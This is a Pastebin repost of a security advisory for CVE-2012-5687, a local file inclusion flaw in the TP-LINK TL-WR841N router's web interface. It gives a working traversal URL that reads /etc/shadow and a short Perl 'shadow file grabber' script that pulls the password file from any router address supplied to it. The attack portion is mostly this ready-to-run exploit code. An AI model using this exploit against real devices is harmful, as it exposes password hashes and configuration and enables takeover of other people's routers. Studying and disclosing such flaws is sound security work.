API tools faq
paste
CyberSecurityNEPAL

CVE-2012-5687

CyberSecurityNEPAL
Aug 13th, 2016
304
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.22 KB | None | 0 0
raw download clone embed print report
  1. | ____| | | (_) | | | / ____| | | (_) |
  2. | |__ __ ___ __ | | ___ _| |_ | |__ _ _ | | _ _| |__ ___ _ __ ___ ___ ___ _ _ _ __ _| |_ _ _
  3. | __| \ \/ / '_ \| |/ _ \| | __| | '_ \| | | | | | | | | | '_ \ / _ \ '__/ __|/ _ \/ __| | | | '__| | __| | | |
  4. | |____ > <| |_) | | (_) | | |_ | |_) | |_| | | |___| |_| | |_) | __/ | \__ \ __/ (__| |_| | | | | |_| |_| |
  5. |______/_/\_\ .__/|_|\___/|_|\__| |_.__/ \__, | \_____\__, |_.__/ \___|_| |___/\___|\___|\__,_|_| |_|\__|\__, |
  6. | | __/ | __/ | __/ |
  7. |_| |___/ |___/ |___/
  8. ##################################################################################################################
  9.  
  10. | Security Advisory - TP-LINK TL-WR841N LFI |=
  11.  
  12. Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
  13. Firmware Version: 3.13.9 Build 120201 Rel.54965n And Below versions
  14. Discovered Date: 24/10/2012
  15. CVE-ID: CVE-2012-5687
  16. Author: Matan Azugi [matan (at) madsec.co (dot) il [email concealed]] Product Vendor:
  17. http://www.tp-link.com/en/products/details/?model=TL-WR841N
  18.  
  19. Details:
  20.  
  21. TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion(LFI)
  22. Vulnerability.
  23. The vulnerability exists in Web-Based Management. The URL parameter is not
  24. properly sanitized before being used.
  25. Exploitation URL:
  26.  
  27. http://192.168.0.1/help/../../../../../../../../etc/shadow
  28.  
  29. Successful exploitation allows viewing the router configuration and password
  30. files.
  31.  
  32. Proof of Concept Code:
  33.  
  34. #TP-LINK TL-WR841N Shadow file grabber#
  35. #built by Pulse matan (at) madsec.co (dot) il [email concealed]#
  36. #enjoy#
  37.  
  38. use LWP::UserAgent;
  39. $host = $ARGV[0];
  40. chomp($host);
  41. if($host !~ /http:\/\//) { $host = "http://$host"; };
  42.  
  43. my $ua = LWP::UserAgent->new;
  44. $ua->timeout(30);
  45. $lfi = "/help/../../../../../../../../etc/shadow";
  46. $url = $host.$lfi;
  47. $request = HTTP::Request->new('GET', $url); $response =
  48. $ua->request($request); my $html = $response->content; if($html =~ /root/) {
  49. print "root$' \n" ; }
  50.  
  51. Thank You,
  52. Matan Azugi, MCSE OSCP
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!